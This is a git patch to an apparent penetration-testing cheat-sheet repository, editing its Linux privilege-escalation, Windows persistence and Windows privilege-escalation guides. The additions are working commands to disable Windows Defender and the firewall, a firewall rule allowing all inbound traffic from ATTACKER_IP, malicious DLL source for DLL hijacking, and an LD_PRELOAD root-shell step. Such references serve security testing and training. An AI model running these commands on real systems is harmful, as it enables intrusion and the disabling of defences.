From fb76fdc3312a5581493330c03915b70b8382b60d Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 1 Feb 2020 22:12:36 +0100
Subject: [PATCH] Windows Firewall + DLL hijacking + Named pipes

---
 .../Linux - Privilege Escalation.md | 97 ++++++++++--------
 .../Windows - Persistence.md | 20 ++++
 .../Windows - Privilege Escalation.md | 31 +++++-
 3 files changed, 102 insertions(+), 46 deletions(-)

diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index ace5ec4..e11bcee 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md
+++ b/Methodology and Resources/Linux - Privilege Escalation.md
@@ -1,5 +1,49 @@
 # Linux - Privilege Escalation
+## Summary
+
+* [Tools](#tools)
+* [Checklist](#checklists)
+* [Looting for passwords](#looting-for-passwords)
+ * [Files containing passwords](#files-containing-passwords)
+ * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
+ * [Last edited files](#last-edited-files)
+ * [In memory passwords](#in-memory-passwords)
+ * [Find sensitive files](#find-sensitive-files)
+* [Scheduled tasks](#scheduled-tasks)
+ * [Cron jobs](#cron-jobs)
+ * [Systemd timers](#systemd-timers)
+* [SUID](#suid)
+ * [Find SUID binaries](#find-suid-binaries)
+ * [Create a SUID binary](#create-a-suid-binary)
+* [Capabilities](#capabilities)
+ * [List capabilities of binaries](#list-capabilities-of-binaries)
+ * [Edit capabilities](#edit-capabilities)
+ * [Interesting capabilities](#interesting-capabilities)
+* [SUDO](#sudo)
+ * [NOPASSWD](#nopasswd)
+ * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd)
+ * [Doas](#doas)
+ * [sudo_inject](#sudo-inject)
+* [GTFOBins](#gtfobins)
+* [Wildcard](#wildcard)
+* [Writable files](#writable-files)
+ * [Writable /etc/passwd](#writable-etcpasswd)
+ * [Writable /etc/sudoers](#writable-etcsudoers)
+* [NFS Root Squashing](#nfs-root-squashing)
+* [Shared Library](#shared-library)
+ * [ldconfig](#ldconfig)
+ * [RPATH](#rpath)
+* [Groups](#groups)
+ * [Docker](#docker)
+ * [LXC/LXD](#lxclxd)
+* [Kernel Exploits](#kernel-exploits)
+ * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
+ * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
+ * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
+ * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
+
+
 ## Tools
 - [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration)
@@ -22,47 +66,6 @@
 - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check)
 - [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER)
-## Summary
-
-* [Checklist](#checklists)
-* [Looting for passwords](#looting-for-passwords)
- * [Files containing passwords](#files-containing-passwords)
- * [Old passwords in /etc/security/opasswd](#old-passwords-in--etc-security-opasswd)
- * [Last edited files](#last-edited-files)
- * [In memory passwords](#in-memory-passwords)
- * [Find sensitive files](#find-sensitive-files)
-* [Scheduled tasks](#scheduled-tasks)
- * [Cron jobs](#cron-jobs)
- * [Systemd timers](#systemd-timers)
-* [SUID](#suid)
- * [Find SUID binaries](#find-suid-binaries)
- * [Create a SUID binary](#create-a-suid-binary)
-* [Capabilities](#capabilities)
- * [List capabilities of binaries](#list-capabilities-of-binaries)
- * [Edit capabilities](#edit-capabilities)
- * [Interesting capabilities](#interesting-capabilities)
-* [SUDO](#sudo)
- * [NOPASSWD](#nopasswd)
- * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd)
- * [Doas](#doas)
- * [sudo_inject](#sudo-inject)
-* [GTFOBins](#gtfobins)
-* [Wildcard](#wildcard)
-* [Writable files](#writable-files)
- * [Writable /etc/passwd](#writable-etcpasswd)
- * [Writable /etc/sudoers](#writable-etcsudoers)
-* [NFS Root Squashing](#nfs-root-squashing)
-* [Shared Library](#shared-library)
- * [ldconfig](#ldconfig)
- * [RPATH](#rpath)
-* [Groups](#groups)
- * [Docker](#docker)
- * [LXC/LXD](#lxclxd)
-* [Kernel Exploits](#kernel-exploits)
- * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow)
- * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds)
- * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson)
- * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper)
 ## Checklists
@@ -356,7 +359,7 @@ If `LD_PRELOAD` is explicitly defined in the sudoers file
 Defaults env_keep += LD_PRELOAD
 ```
-Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
+Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles`
 ```powershell
 #include
@@ -370,7 +373,7 @@ void _init() {
 }
 ```
-Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find`
+Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD= `, e.g: `sudo LD_PRELOAD=/tmp/shell.so find`
 ### Doas
@@ -478,14 +481,17 @@ echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
 ## NFS Root Squashing
-When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
+When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it.
 ```powershell
+# remote check the name of the folder
+showmount -e 10.10.10.10
+
 # create dir
 mkdir /tmp/nfsdir
 # mount directory
-mount -t nfs 10.10.10.10:/shared /tmp/nfsdir
+mount -t nfs 10.10.10.10:/shared /tmp/nfsdir
 cd /tmp/nfsdir
 # copy wanted shell
@@ -690,3 +696,4 @@ https://www.exploit-db.com/exploits/18411
 - [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
 - [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject)
 * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html)
+* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 69986f5..f72f90c 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -3,6 +3,8 @@
 ## Summary
 * [Tools](#tools)
+* [Disable Windows Defender](#disable-windows-defender)
+* [Disable Windows Firewall](#disable-windows-firewall)
 * [Userland](#userland)
 * [Registry](#registry)
 * [Startup](#startup)
@@ -19,6 +21,24 @@
 - [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
+## Disable Windows Defender
+
+```powershell
+sc config WinDefend start= disabled
+sc stop WinDefend
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+## Disable Windows Firewall
+
+```powershell
+Netsh Advfirewall show allprofiles
+NetSh Advfirewall set allprofiles state off
+
+# ip whitelisting
+New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
+```
+
 ## Userland
 Set a file as hidden
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 955e79f..c863c8b 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md
+++ b/Methodology and Resources/Windows - Privilege Escalation.md
@@ -20,6 +20,7 @@
 * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
 * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
 * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths)
+* [EoP - Named Pipes](#eop---named-pipes)
 * [EoP - Kernel Exploitation](#eop---kernel-exploitation)
 * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
@@ -470,6 +471,26 @@ dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
 Often, services are pointing to writeable locations:
 - Orphaned installs, not installed anymore but still exist in startup
 - DLL Hijacking
+ ```powershell
+ # find missing DLL
+ - Find-PathDLLHijack PowerUp.ps1
+ - Process Monitor : check for "Name Not Found"
+
+ # compile a malicious dll
+ - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
+ - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
+
+ # content of windows_dll.c
+ #include
+ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+ if (dwReason == DLL_PROCESS_ATTACH) {
+ system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
+ ExitProcess(0);
+ }
+ return TRUE;
+ }
+ ```
+
 - PATH directories with weak permissions
 ```powershell
@@ -605,6 +626,13 @@ For `C:\Program Files\something\legit.exe`, Windows will try the following paths
 - `C:\Program.exe`
 - `C:\Program Files.exe`
+## EoP - Named Pipes
+
+1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")`
+2. Check named pipes DACL: `pipesec.exe `
+3. Reverse engineering software
+4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe`
+
 ## EoP - Kernel Exploitation
@@ -949,4 +977,5 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
 * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
 * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
 * [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
-* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
\ No newline at end of file
+* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
+* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
\ No newline at end of file